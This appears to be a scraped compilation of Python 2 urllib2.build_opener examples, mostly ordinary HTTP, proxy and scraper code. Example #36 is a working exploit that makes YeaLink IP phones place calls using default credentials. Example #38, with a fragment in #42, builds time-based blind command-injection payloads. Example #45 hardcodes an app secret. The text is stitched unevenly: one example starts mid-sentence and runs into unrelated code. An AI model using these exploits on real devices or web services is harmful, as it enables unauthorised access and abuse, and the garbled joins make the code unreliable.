            proxy_handler = urllib2.ProxyHandler({"http": turbo_local_proxy})
            opener =  urllib2.build_opener(proxy_handler)
        else:
            opener =  urllib2.build_opener()
        resp = opener.open(req, timeout = 1000000)
        cntype = resp.headers.getheader("content-type")
        print "content-type", cntype
        print "status code", resp.getcode()
        # print "headers", resp.headers
        size = len(resp.read())
        loadtime = time.time() - begin
        print "page size", size
        print "loadtime is ", loadtime
        profiler.addSize(size)
        profiler.addRescources(url, resp.getcode() ,cntype, int(loadtime * 1000))
        return loadtime
    except ValueError:
        pass
    finally:
        opener.close()
Example #30
def get_urlopen():
    proxy_type = get_prefs('proxy_type')
    if proxy_type == 'http':
        scheme = 'http'
        host = str(get_prefs('proxy_host'))
        port = str(get_prefs('proxy_port'))
        url = scheme + '://' + host + ':' + port
        if get_prefs('proxy_auth'):
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            username = str(get_prefs('proxy_auth_name'))
            password = str(get_prefs('proxy_auth_password'))
            auth_handler = urllib2.ProxyBasicAuthHandler()
            auth_handler.add_password(None, url, username, password)
            return urllib2.build_opener(proxy_support, auth_handler).open
        else:
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            return urllib2.build_opener(proxy_support).open
    elif proxy_type == 'system':
        if 'http_proxy' in os.environ and os.environ["http_proxy"]:
            url = os.environ["http_proxy"]
        elif 'HTTP_PROXY' in os.environ and os.environ["HTTP_PROXY"]:
            url = os.environ["HTTP_PROXY"]
        else:
            url = None

        if not url:
            return urllib2.urlopen
        else:
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            return urllib2.build_opener(proxy_support).open
    else:
        return urllib2.urlopen
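Hypothetical usage, assuming `get_prefs` reads the proxy settings shown above:

urlopen = get_urlopen()
resp = urlopen('http://example.com/')
print resp.getcode()
resp.close()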
Example #31
 def __init__(self):
     opener = urllib2.build_opener()
     # Set User-Agent
     opener.addheaders = [('User-Agent', self.__USERAGENT)]
     urllib2.install_opener(opener)
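The design choice here is global state: once installed, the opener is used by every plain `urllib2.urlopen` call in the process. A minimal sketch of the effect (the User-Agent string is an assumption):

import urllib2

opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', 'my-crawler/1.0')]  # hypothetical UA
urllib2.install_opener(opener)

# later urlopen() calls now send the custom User-Agent automatically
print urllib2.urlopen('http://example.com/').getcode()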
Example #32
def read_config(config_file):
    global config

    if not os.path.isfile(config_file):
        exit("[!] missing configuration file '%s'" % config_file)
    else:
        print "[i] using configuration file '%s'" % config_file

    config.clear()

    try:
        array = None
        content = open(config_file, "rb").read()

        for line in content.split("\n"):
            line = line.strip('\r')
            line = re.sub(r"\s*#.*", "", line)
            if not line.strip():
                continue

            if line.count(' ') == 0:
                if re.search(r"[^\w]", line):
                    if array == "USERS":
                        exit(
                            "[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)"
                            % line)
                    else:
                        exit("[!] invalid configuration (line: '%s')" % line)
                array = line.upper()
                config[array] = []
                continue

            if array and line.startswith(' '):
                config[array].append(line.strip())
                continue
            else:
                array = None
                try:
                    name, value = line.strip().split(' ', 1)
                except ValueError:
                    name = line
                    value = ""
                finally:
                    name = name.strip().upper()
                    value = value.strip("'\"").strip()

            _ = os.environ.get("%s_%s" % (NAME.upper(), name))
            if _:
                value = _

            if any(
                    name.startswith(_)
                    for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_",
                              "DISABLE_")):
                value = value.lower() in ("1", "true")
            elif value.isdigit():
                value = int(value)
            else:
                for match in re.finditer(r"\$([A-Z0-9_]+)", value):
                    if match.group(1) in globals():
                        value = value.replace(match.group(0),
                                              str(globals()[match.group(1)]))
                    else:
                        value = value.replace(
                            match.group(0),
                            os.environ.get(match.group(1), match.group(0)))
                if name.endswith("_DIR"):
                    value = os.path.realpath(
                        os.path.join(ROOT_DIR, os.path.expanduser(value)))

            config[name] = value

    except (IOError, OSError):
        pass

    for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"):
        if option not in config:
            exit("[!] missing mandatory option '%s' in configuration file '%s'"
                 % (option, config_file))

    for entry in (config.USERS or []):
        if len(entry.split(':')) != 4:
            exit("[!] invalid USERS entry '%s'" % entry)
        if re.search(r"\$\d+\$", entry):
            exit(
                "[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)"
                % entry)

    if config.SSL_PEM:
        config.SSL_PEM = config.SSL_PEM.replace('/', os.sep)

    if config.USER_WHITELIST:
        if ',' in config.USER_WHITELIST:
            print(
                "[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file"
            )
        elif not os.path.isfile(config.USER_WHITELIST):
            exit("[!] missing 'USER_WHITELIST' file '%s'" %
                 config.USER_WHITELIST)
        else:
            read_whitelist()

    if config.USER_IGNORELIST:
        if not os.path.isfile(config.USER_IGNORELIST):
            exit("[!] missing 'USER_IGNORELIST' file '%s'" %
                 config.USER_IGNORELIST)
        else:
            read_ignorelist()

    config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES)

    if config.USE_MULTIPROCESSING:
        print(
            "[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead"
        )

    if config.DISABLE_LOCAL_LOG_STORAGE and not any(
        (config.LOG_SERVER, config.SYSLOG_SERVER)):
        print(
            "[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data"
        )

    if config.UDP_ADDRESS is not None and config.UDP_PORT is None:
        exit(
            "[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'"
        )

    if config.UDP_ADDRESS is None and config.UDP_PORT is not None:
        exit(
            "[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'"
        )

    if not str(config.HTTP_PORT or "").isdigit():
        exit("[!] invalid configuration value for 'HTTP_PORT' ('%s')" %
             config.HTTP_PORT)

    if config.PROCESS_COUNT and subprocess.mswindows:
        print "[x] multiprocessing is currently not supported on Windows OS"
        config.PROCESS_COUNT = 1

    if config.CAPTURE_BUFFER:
        if str(config.CAPTURE_BUFFER or "").isdigit():
            config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER)
        elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER):
            match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER)
            config.CAPTURE_BUFFER = int(match.group(1)) * {
                "K": 1024,
                "M": 1024**2,
                "G": 1024**3
            }[match.group(2).upper()]
        elif re.search(r"\d+%", config.CAPTURE_BUFFER):
            physmem = _get_total_physmem()

            if physmem:
                config.CAPTURE_BUFFER = physmem * int(
                    re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100
            else:
                exit(
                    "[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'"
                )
        else:
            exit(
                "[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" %
                config.CAPTURE_BUFFER)

        config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH

    if config.PROXY_ADDRESS:
        PROXIES.update({
            "http": config.PROXY_ADDRESS,
            "https": config.PROXY_ADDRESS
        })
        opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES))
        urllib2.install_opener(opener)
Example #33
    def _cached_http_get(self,
                         url,
                         base_url,
                         timeout,
                         cookies=None,
                         data=None,
                         multipart_data=None,
                         headers=None,
                         allow_redirect=True,
                         cache_limit=8):
        if cookies is None: cookies = {}
        if timeout == 0: timeout = None
        if headers is None: headers = {}
        referer = headers['Referer'] if 'Referer' in headers else url
        log_utils.log(
            'Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' %
            (url, cookies, data, headers))
        self.create_db_connection()
        _, html = self.db_connection.get_cached_url(url, cache_limit)
        if html:
            log_utils.log('Returning cached result for: %s' % (url),
                          xbmc.LOGDEBUG)
            return html

        try:
            self.cj = self._set_cookies(base_url, cookies)
            if data is not None: data = urllib.urlencode(data, True)
            if multipart_data is not None:
                headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X'
                data = multipart_data

            request = urllib2.Request(url, data=data)
            request.add_header('User-Agent', USER_AGENT)
            request.add_unredirected_header('Host', request.get_host())
            request.add_unredirected_header('Referer', referer)
            for key in headers:
                request.add_header(key, headers[key])
            self.cj.add_cookie_header(request)
            if not allow_redirect:
                opener = urllib2.build_opener(NoRedirection)
                urllib2.install_opener(opener)
            else:
                opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
                urllib2.install_opener(opener)

            response = urllib2.urlopen(request, timeout=timeout)
            self.cj.extract_cookies(response, request)
            if xbmcaddon.Addon().getSetting('cookie_debug') == 'true':
                log_utils.log(
                    'Response Cookies: %s - %s' %
                    (url, self.cookies_as_str(self.cj)), xbmc.LOGDEBUG)
            self.__fix_bad_cookies()
            self.cj.save(ignore_discard=True)
            if not allow_redirect and response.getcode() in [
                    301, 302, 303, 307
            ]:
                return response.info().getheader('Location')

            if response.info().get('Content-Encoding') == 'gzip':
                buf = StringIO(response.read())
                f = gzip.GzipFile(fileobj=buf)
                html = f.read()
            else:
                html = response.read()
        except urllib2.HTTPError as e:
            if e.code == 503 and 'cf-browser-verification' in e.read():
                html = cloudflare.solve(url, self.cj)
                if not html:
                    return ''
            else:
                log_utils.log(
                    'Error (%s) during scraper http get: %s' % (str(e), url),
                    xbmc.LOGWARNING)
                return ''
        except Exception as e:
            log_utils.log(
                'Error (%s) during scraper http get: %s' % (str(e), url),
                xbmc.LOGWARNING)
            return ''

        self.db_connection.cache_url(url, html)
        return html
Example #34
def _setup_http_client(proxy):
    """Configure proxy server and install HTTP opener"""
    proxy_config = {'http': proxy} if proxy else {}
    proxy_handler = urllib2.ProxyHandler(proxy_config)
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
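Hypothetical usage of the helper above; the proxy address is an assumption:

_setup_http_client('http://127.0.0.1:8080')  # route HTTP through a local proxy
print urllib2.urlopen('http://example.com/').getcode()

_setup_http_client(None)  # install a no-proxy opener again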
Example #35
def do_login(username, pwd, cookie_file):
    """"
    Perform login action with use name, password and saving cookies.
    @param username: login user name
    @param pwd: login password
    @param cookie_file: file name where to save cookies when login succeeded 
    """
    # POST data for weibo login; these fields can be captured using the httpfox extension in Firefox
    login_data = {
        'entry': 'weibo',
        'gateway': '1',
        'from': '',
        'savestate': '7',
        'userticket': '1',
        'pagerefer': '',
        'vsnf': '1',
        'su': '',
        'service': 'miniblog',
        'servertime': '',
        'nonce': '',
        'pwencode': 'rsa2',
        'rsakv': '',
        'sp': '',
        'encoding': 'UTF-8',
        'prelt': '45',
        'url':
        'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack',
        'returntype': 'META'
    }

    cookie_jar2 = cookielib.LWPCookieJar()
    cookie_support2 = urllib2.HTTPCookieProcessor(cookie_jar2)
    opener2 = urllib2.build_opener(cookie_support2, urllib2.HTTPHandler)
    urllib2.install_opener(opener2)
    login_url = 'http://login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.11)'
    try:
        servertime, nonce, rsakv = get_prelogin_status(username)
    except:
        return

    # Fill POST data
    print 'starting to set login_data'
    login_data['servertime'] = servertime
    login_data['nonce'] = nonce
    login_data['su'] = get_user(username)
    login_data['sp'] = get_pwd_rsa(pwd, servertime, nonce)
    login_data['rsakv'] = rsakv
    login_data = urllib.urlencode(login_data)
    http_headers = {
        'User-Agent':
        'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0'
    }
    req_login = urllib2.Request(url=login_url,
                                data=login_data,
                                headers=http_headers)
    result = urllib2.urlopen(req_login)
    text = result.read()
    p = re.compile('location\.replace\(\'(.*?)\'\)')
    # While debugging the login with httpfox, the returned parameter was
    # location.replace('http://weibo.com ...) with single quotes; the original
    # regex matched double quotes, so no login_url was captured. A single
    # quote itself needs no escaping in a regex.
    # p = re.compile('location\.replace\(\B'(.*?)'\B\)')  # verified wrong while debugging; \' is what expresses the single quote in re
    try:
        # Search login redirection URL
        login_url = p.search(text).group(1)
        data = urllib2.urlopen(login_url).read()
        # Verify login feedback, check whether result is TRUE
        patt_feedback = 'feedBackUrlCallBack\((.*)\)'
        p = re.compile(patt_feedback, re.MULTILINE)

        feedback = p.search(data).group(1)
        feedback_json = json.loads(feedback)
        if feedback_json['result']:
            cookie_jar2.save(cookie_file,
                             ignore_discard=True,
                             ignore_expires=True)
            return 1
        else:
            return 0
    except:
        return 0
Example #36
available sip account, without supervision or confirmation of the user,
also the call receiver can listen through the phone mic .]

#!/usr/bin/python

import urllib2, sys

print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"

if (len(sys.argv) != 3):
    print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
    print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
    exit(0)

IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
webU = 'user'
webP = 'user'

query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)


urllib2.install_opener(log)

queryPag = urllib2.urlopen(UrlGet_params)

print "\n Call to %s form IP phone %s\n" %(num,IP)
print 'CHECK: ' + CHECK
print 'ALLKMEANS: ' + ALLKMEANS
print 'ALLMATMUL: ' + ALLMATMUL

POSTDATA = urllib.urlencode({
    'j_username': '******',
    'j_password': '******',
    'from': '/',
    'json':
    '{"j_username": "******", "j_password": "******", "remember_me": false, "from": "/"}',
    'Submit': 'log in'
})
print 'POSTDATA OK'

cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
print 'Cookie Support OK'

if os.path.exists(DATADIR):
    print 'Data Folder Exists'
    OFFLINE = 1
else:
    print 'Create Data Folder'
    os.mkdir(DATADIR)
    OFFLINE = 0
    print 'OK'

print _GAP
print '# Get Cookie to Log in'
print _GAP
Example #38
def exploitation(url, delay, filename):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    injection_type = "Blind-based Command Injection"
    technique = "time-based injection technique"

    # Print the findings to log file.
    output_file = open(filename + ".txt", "a")
    output_file.write("\n---")
    output_file.write("\n(+) Type : " + injection_type)
    output_file.write("\n(+) Technique : " + technique.title())
    output_file.close()

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = menu.options.maxlen

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print colors.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + colors.RESET

    sys.stdout.write("(*) Testing the " + technique + "... ")
    sys.stdout.flush()

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for seperator in settings.SEPERATORS:

                # Encode (urlencode) prefixes and suffixes
                encoded_prefix = urllib.quote_plus(prefix)
                encoded_suffix = urllib.quote_plus(suffix)

                # Change TAG on every request to prevent false-positive results.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase) for i in range(6))
                tag_length = len(TAG) + 4
                for j in range(1, int(tag_length)):
                    try:
                        if seperator == ";":
                            payload = (
                                seperator + " "
                                "str=$(echo " + TAG + ")" + seperator + " "
                                # Find the length of the output.
                                "str1=${#str}" + seperator + " "
                                "if [ \"" + str(j) + "\" -ne ${str1} ]" +
                                seperator + " "
                                "then sleep 0" + seperator + " "
                                "else sleep " + str(delay) + seperator + " "
                                "fi ")

                        elif seperator == "&&":
                            payload = (
                                urllib.quote('&') + " " + "sleep 0 " +
                                urllib.quote(seperator) + " "
                                "str=$(echo " + TAG + ")" +
                                urllib.quote(seperator) + " "
                                # Find the length of the output.
                                "str1=${#str}" + urllib.quote(seperator) + " "
                                "[ " + str(j) + " -eq ${str1} ]" +
                                urllib.quote(seperator) + " "
                                "sleep 1 ")

                        elif seperator == "||":
                            payload = (seperator + " "
                                       "echo '" + TAG + "' | " + "[ " +
                                       str(j) + " -ne $(echo \"" + TAG +
                                       "\" | wc -c) ] " + seperator + " "
                                       "sleep " + str(delay))
                        else:
                            pass

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload

                        else:
                            encoded_payload = encoded_prefix + payload
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix

                        else:
                            encoded_payload = encoded_payload + encoded_suffix
                            payload = payload + suffix

                        payload_list = []
                        if payload != encoded_payload:
                            payload_list.append(payload)
                            payload_list.append(encoded_payload)
                        else:
                            payload_list.append(payload)

                        for payload in payload_list:
                            if urllib.unquote(payload) == payload:
                                is_encoded = True

                            #payload = re.sub(" ", "%20", payload)
                            # Check if defined "--verbose" option.
                            if menu.options.verbose:
                                if seperator == ";" or seperator == "&&" or seperator == "||":
                                    sys.stdout.write("\n" + colors.GREY +
                                                     payload + colors.RESET)

                            end = 0
                            start = time.time()

                            # Check if the request method is GET (default).
                            if menu.options.method == "GET":
                                payload = urllib.quote(payload)

                                # Define the vulnerable parameter
                                if re.findall(
                                        r"&(.*)=" + settings.INJECT_TAG + "",
                                        url):
                                    vuln_parameter = re.findall(
                                        r"&(.*)=" + settings.INJECT_TAG + "",
                                        url)
                                    vuln_parameter = ''.join(vuln_parameter)

                                elif re.findall(
                                        r"\?(.*)=" + settings.INJECT_TAG + "",
                                        url):
                                    vuln_parameter = re.findall(
                                        r"\?(.*)=" + settings.INJECT_TAG + "",
                                        url)
                                    vuln_parameter = ''.join(vuln_parameter)

                                else:
                                    vuln_parameter = url

                                target = re.sub(settings.INJECT_TAG, payload,
                                                url)
                                request = urllib2.Request(target)

                                # Check if any extra headers are defined.
                                headers.do_check(request)

                                # Check if an HTTP proxy is defined.
                                if menu.options.proxy:
                                    try:
                                        proxy = urllib2.ProxyHandler(
                                            {'http': menu.options.proxy})
                                        opener = urllib2.build_opener(proxy)
                                        urllib2.install_opener(opener)
                                        response = urllib2.urlopen(request)
                                        response.read()

                                    except urllib2.HTTPError, err:
                                        print "\n(x) Error : " + str(err)
                                        sys.exit(1)

                                else:
                                    response = urllib2.urlopen(request)
                                    response.read()

                            # Check if the request method is POST.
                            else:
                                # Check if the testable parameter is defined.
                                if not menu.options.parameter:
                                    print colors.RED + "(x) Error: You must specify the testable parameter.\n" + colors.RESET
                                    break

                                else:
                                    parameter = menu.options.parameter
                                    parameter = urllib2.unquote(parameter)
                                    data = re.sub(settings.INJECT_TAG, payload,
                                                  parameter)

                                    # Define the vulnerable parameter
                                    if re.findall(
                                            r"&(.*)=" + settings.INJECT_TAG +
                                            "", url):
                                        vuln_parameter = re.findall(
                                            r"&(.*)=" + settings.INJECT_TAG +
                                            "", url)
                                        vuln_parameter = ''.join(
                                            vuln_parameter)

                                    elif re.findall(
                                            r"\?(.*)=" + settings.INJECT_TAG +
                                            "", url):
                                        vuln_parameter = re.findall(
                                            r"\?(.*)=" + settings.INJECT_TAG +
                                            "", url)
                                        vuln_parameter = ''.join(
                                            vuln_parameter)

                                    else:
                                        vuln_parameter = parameter

                                    request = urllib2.Request(url, data)

                                    # Check if any extra headers are defined.
                                    headers.do_check(request)

                                    # Check if an HTTP proxy is defined.
                                    if menu.options.proxy:
                                        try:
                                            proxy = urllib2.ProxyHandler(
                                                {'http': menu.options.proxy})
                                            opener = urllib2.build_opener(
                                                proxy)
                                            urllib2.install_opener(opener)
                                            response = urllib2.urlopen(request)
                                            response.read()

                                        except urllib2.HTTPError, err:
                                            print "\n(x) Error : " + str(err)
                                            sys.exit(1)

                                    else:
                                        response = urllib2.urlopen(request)
                                        response.read()

                            end = time.time()
                            how_long = int(end - start)
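
The excerpt stops right after the response is timed. For orientation, a minimal sketch of the comparison that typically follows in time-based blind detection (how_long, delay, seperator and j come from the code above; the threshold check itself is an assumption, not the original author's code):

# Hypothetical follow-up (assumption): the guessed output length j is
# taken as correct when the injected sleep measurably delayed the response.
if how_long >= delay:
    print "(!) Output length " + str(j) + " confirmed via '" + seperator + "' separator (" + str(how_long) + "s)"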
Example #39
0
            gravatar_url = "http://www.gravatar.com/avatar/" + hashlib.md5(
                email.lower()).hexdigest() + "?"
            gravatar_url += urllib.urlencode({'d': default, 's': str(size)})
            userIconURL = gravatar_url
            self.debugLog(u"User icon set to gravatar: %s" % userIconURL)
        else:
            self.debugLog(u"User icon url set to: %s" % userIconURL)
        ##############################################################################################

        # construct the file upload ##################################################################
        if theFilePath is None or theFilePath == "":
            self.debugLog(u"No file path was entered")
        else:
            theFilePath = theFilePath.strip()
            if os.path.isfile(theFilePath):
                opener = urllib2.build_opener(
                    MultipartPostHandler.MultipartPostHandler)
                params = {"token": slackToken, "file": open(theFilePath, "rb")}
                fileUploadURL = 'https://slack.com/api/files.upload?'
            else:
                indigo.server.log(u"Invalid path to the file.")
        ##############################################################################################

        # construct and attempt to send payload to Slack #############################################
        if theUsername is None or theUsername == "":
            theUsername = userName
            self.debugLog(u"Username set to %s (bot)" % userName)
        surl = 'https://hooks.slack.com/services/%s' % URLtoken
        self.debugLog(u"Slack payload url: %s" % surl)
        if pluginAction.props['imageurl'] is None or pluginAction.props[
                'imageurl'] == "":
            if theChannel and theUsername and theText != "":
Example #40
0
import urllib
import urllib2

def post(url, data):
    """POST a dict of form fields to url and return the response body."""
    req = urllib2.Request(url)
    data = urllib.urlencode(data)
    # Cookie-aware opener: cookies set by the server are reused by this opener.
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    response = opener.open(req, data)
    return response.read()
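
A quick usage sketch for post() (the URL and form fields below are placeholders for illustration, not values from the original source):

body = post('http://example.com/login', {'user': 'alice', 'pwd': 'secret'})
print body[:200]  # first part of the response body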
Example #41
0
start_end_times = [[query_day + " 00:00:00", query_day + " 18:59:59"],
                   [query_day + " 19:00:00", query_day + " 23:59:59"]]
# query_set = [
#     u'所有操作慢',    # "all operations are slow"
#     u'浏览网页慢',    # "web browsing is slow"
#     u'他网视频慢',    # "video from other networks is slow"
#     u'下载慢',        # "downloads are slow"
#     u'游戏慢',        # "games are slow"
#     u'游戏问题'       # "game problems"
# ]
query_codes = ['3222', '3223', '3224', '3225', '3226', '3229']
# The matching query codes above were obtained with Firebug.
postUrl = 'http://218.108.129.189:19090/ccps/login.action'
cookie = cookielib.CookieJar()
handler = urllib2.HTTPCookieProcessor(cookie)
post_opener = urllib2.build_opener(handler)
# Bind the cookies to an opener; cookielib manages the cookie jar automatically.
username = '******'
password = '******'
postData = {
    'staff.password': password,
    'staff.wcode': username,
}
headers = {
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding':
    'gzip, deflate',
    'Accept-Language':
    'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Host':
Example #42
0
                                                request = urllib2.Request(target)

                                                # Check if any extra headers are defined.
                                                headers.do_check(request)

                                                # Check if an HTTP proxy is defined.
                                                if menu.options.proxy:
                                                    try:
                                                        proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
                                                        opener = urllib2.build_opener(proxy)
                                                        urllib2.install_opener(opener)
                                                        response = urllib2.urlopen(request)
                                                        response.read()

                                                    except urllib2.HTTPError, err:
                                                        print "\n(x) Error : " + str(err)
                                                        sys.exit(1)

                                                else:
                                                    response = urllib2.urlopen(request)
                                                    response.read()
Example #43
0
        rec = {'tc' : 'T', 'keyw' : [], 'jnl' : 'BOOK'}
        for a in div.find_all('a'):
            rec['artlink'] = 'https://dspace.cuni.cz' + a['href'] #+ '?show=full'
            rec['hdl'] = re.sub('.*handle\/', '', a['href'])
            for h5 in div.find_all('h5', attrs = {'class' : 'work-type'}):
                if re.search('dissertation thesis', h5.text):
                    recs.append(rec)
                else:
                    print '[%i] skip %s' % (i, h5.text.strip())

    i = 0
    for rec in recs:
        i += 1
        print '---{ %s }---{ %i/%i}---{ %s }------' % (year, i, len(recs), rec['artlink'])
        try:
            artpage = BeautifulSoup(urllib2.build_opener(urllib2.HTTPCookieProcessor).open(rec['artlink']))
            time.sleep(3)
        except:
            try:
                print "retry %s in 180 seconds" % (rec['artlink'])
                time.sleep(180)
                artpage = BeautifulSoup(urllib2.build_opener(urllib2.HTTPCookieProcessor).open(rec['artlink']))
            except:
                print "no access to %s" % (rec['artlink'])
                continue    
        for meta in artpage.head.find_all('meta'):
            if meta.has_attr('name'):
                #author
                if meta['name'] == 'DC.creator':
                    author = re.sub(' *\[.*', '', meta['content'])
                    rec['autaff'] = [[ author ]]
Example #44
0
def sendNZB(nzb):
    """
    Sends an NZB to SABnzbd via the API.

    :param nzb: The NZBSearchResult object to send to SAB
    """

    # set up a dict with the URL params in it
    params = {}
    if sickbeard.SAB_USERNAME is not None:
        params[b'ma_username'] = sickbeard.SAB_USERNAME
    if sickbeard.SAB_PASSWORD is not None:
        params[b'ma_password'] = sickbeard.SAB_PASSWORD
    if sickbeard.SAB_APIKEY is not None:
        params[b'apikey'] = sickbeard.SAB_APIKEY
    category = sickbeard.SAB_CATEGORY
    if nzb.show.is_anime:
        category = sickbeard.SAB_CATEGORY_ANIME

    # if it aired more than 7 days ago, override with the backlog category IDs
    for curEp in nzb.episodes:
        if datetime.date.today() - curEp.airdate > datetime.timedelta(days=7):
            category = sickbeard.SAB_CATEGORY_BACKLOG
            if nzb.show.is_anime:
                category = sickbeard.SAB_CATEGORY_ANIME_BACKLOG

    if category is not None:
        params[b'cat'] = category

    # use high priority if specified (recently aired episode)
    if nzb.priority == 1:
        if sickbeard.SAB_FORCED == 1:
            params[b'priority'] = 2
        else:
            params[b'priority'] = 1

    # if it's a normal result we just pass SAB the URL
    if nzb.resultType == "nzb":
        # for newzbin results send the ID to sab specifically
        if nzb.provider.getID() == 'newzbin':
            id = nzb.provider.getIDFromURL(nzb.url)
            if not id:
                logging.error("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url))
                return False
            params[b'mode'] = 'addid'
            params[b'name'] = id
        else:
            params[b'mode'] = 'addurl'
            params[b'name'] = nzb.url

    # if we get a raw data result we want to upload it to SAB
    elif nzb.resultType == "nzbdata":
        params[b'mode'] = 'addfile'
        multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

    url = sickbeard.SAB_HOST + "api?" + urllib.urlencode(params)

    logging.info("Sending NZB to SABnzbd")
    logging.debug("URL: " + url)

    f = None

    try:
        # if we have the URL to an NZB then we've built up the SAB API URL already so just call it
        if nzb.resultType == "nzb":
            f = urllib.urlopen(url)

        # if we are uploading the NZB data to SAB then we need to build a little POST form and send it
        elif nzb.resultType == "nzbdata":
            cookies = cookielib.CookieJar()
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                          MultipartPostHandler.MultipartPostHandler)
            req = urllib2.Request(url,
                                  multiPartParams,
                                  headers={'User-Agent': USER_AGENT})

            f = opener.open(req)

    except (EOFError, IOError) as e:
        logging.error("Unable to connect to SAB: {}".format(ex(e)))
        return False

    except httplib.InvalidURL as e:
        logging.error("Invalid SAB host, check your config: {}".format(ex(e)))
        return False

    # this means we couldn't open the connection or something just as bad
    if f is None:
        logging.error("No data returned from SABnzbd, NZB not sent")
        return False

    # if we opened the URL connection then read the result from SAB
    try:
        result = f.readlines()
    except Exception as e:
        logging.error("Error trying to get result from SAB, NZB not sent: {}".format(ex(e)))
        return False

    # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't receive the NZB
    if len(result) == 0:
        logging.error("No data returned from SABnzbd, NZB not sent")
        return False

    # massage the result a little bit
    sabText = result[0].strip()

    logging.debug("Result text from SAB: " + sabText)

    # do some crude parsing of the result text to determine what SAB said
    if sabText == "ok":
        logging.debug("NZB sent to SAB successfully")
        return True
    elif sabText == "Missing authentication":
        logging.error("Incorrect username/password sent to SAB, NZB not sent")
        return False
    else:
        logging.error("Unknown failure sending NZB to sab. Return text is: " + sabText)
        return False
Example #45
0
import sys
import urllib2

#sina
APP_KEY = '377217891'  # your app key
APP_SECRET = '723905a68a35ca6e2f30016230337e8f'  # your app secret
CALLBACK_URL = 'http://6.helloelmer.sinaapp.com/callback'
ACCOUNT = '*****@*****.**'  # your email address
PASSWORD = sys.argv[1]  # '******'  # your password

#gplus
GPLUS_ENABLE = True

GPLUS_URLS = ("https://plus.google.com/communities/112204979951069292983", )

#proxy
PROXY = None  #"http://127.0.0.1"
if PROXY:
    proxy_support = urllib2.ProxyHandler({'http': PROXY})
    opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
    urllib2.install_opener(opener)
Example #46
0
pages = int(raw_input("enter number of pages to scrape: "))

url = 'https://www.reddit.com/'

i = 1

while pages > 0:

    request = urllib2.Request(url)

    request.add_header(
        'User-Agent',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
    )

    myurlopener = urllib2.build_opener()

    myurl = myurlopener.open(request)

    spinner = Halo(text="Processing Page", spinner="dots")

    spinner.start()

    myurldata = myurl.read()

    soup = BeautifulSoup(myurldata, 'lxml')

    # find the div containing data and iterate over it
    for choice in soup.find_all('div', class_='thing'):

        topicName = choice.find('p', class_='title').a.text.encode(
Example #47
0
def build_opener(*args, **kwargs):
    if PYTHON_3:
        return urllib.request.build_opener(*args, **kwargs)
    else:
        return urllib2.build_opener(*args, **kwargs)  # @UndefinedVariable
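
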